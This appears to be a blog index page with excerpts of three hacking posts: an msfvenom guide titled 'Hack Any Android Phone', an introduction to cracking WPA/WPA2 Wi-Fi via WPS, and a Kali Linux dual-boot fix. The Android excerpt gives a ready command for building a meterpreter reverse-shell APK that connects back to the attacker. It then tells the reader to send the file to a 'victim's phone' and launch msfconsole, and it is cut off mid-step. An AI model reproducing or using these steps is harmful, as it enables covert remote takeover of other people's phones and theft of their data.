Posts

Showing posts from February 28, 2016

Metasploit for the Future Hackers (msfvenom) : Hack Any Android Phone

Image
msfvenom is a kali linux hacking tool for android ,is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance known as msfvenom payload. Hacking With METASPLOIT in Kali Linux is a old tool. Metasploit is enhanced by msfvenom in kali linux. Metasploit is now a outdated tool. So, let's get started!! STEPS : 1. Fire Up kali and open command terminal. 2. Set payload and create custom windows executable. Command: msfvenom -p android/meterpreter/reverse_tcp  LHOST=192.168.0.110 LPORT=4444 R > andro.apk (To know your LHOST, open new terminal and type ifconfig ) Your apk file is being saved in the Home folder. Note: Don't add any stray space characters anywhere. Use the command as is (after changing the LHOST and LPORT as needed). 3. Transfer/mail this file (here andro.apk) file to the victim's phone and install it. 4. Start the metasploit framework console as follows :         Command:                     msfconsole 5. Now it'

Hack WPA/WPA2 WPS Wifi Hack

Image
When it was known that a WEP network could be hacked by any kid with a laptop and a network connection (using easy peasy tutorials like those on our blog), the security guys did succeed in making a much more robust security measure WPA/WPA2. Now hacking WPA/WPA2 is a very tedious job in most cases. A dictionary attack may take days, and still might not succeed. Also, good dictionaries are huge. An exhaustive bruteforce including all the alphabets (uppercase lowercase) and numbers, may take years, depending on password length. Rainbow tables are known to speed things up, by completing a part of the guessing job beforehand, but the output rainbow table that needs to be downloaded from the net is disastrously large (can be 100s of GBs sometimes). And finally the security folks were at peace. But it was not over yet, as the new WPA technology was not at all easy for the users to configure. With this in mind, a new security measure was introduced to compliment WPA. Wifi Protected Set

Dual Booting Kali Linux Alongside Windows 10...

Image
We All Know how the Kali Linux became the worlds best operating system for Penetration Testing and hacking for all those young hackers sitting at their homes messing with this OS But everyone got some problem believe me when i say that every one at some point get it then its true because i got it too. So i am posting the solution for the problem which i got. The Main Problem With Kali 2.0 is The Typical Method Of Booting It With Flash Drive Along Side An Windows Operating System. You see when we try to boot Kali Linux 2.0 the Regular way as we did it in the previous versions of the Kali we get an error during installation process. At some point it says " Can't mount and detect CD-ROM drives " and we can not go any further in the installation and ultimately we have exit the installation. The Required Softwares. 1. Power ISO 2. Kali ISO (Downloading 32 bit OR 64 bit is your Choice.) To Overcome this problem Please look at tutorial video for the solution.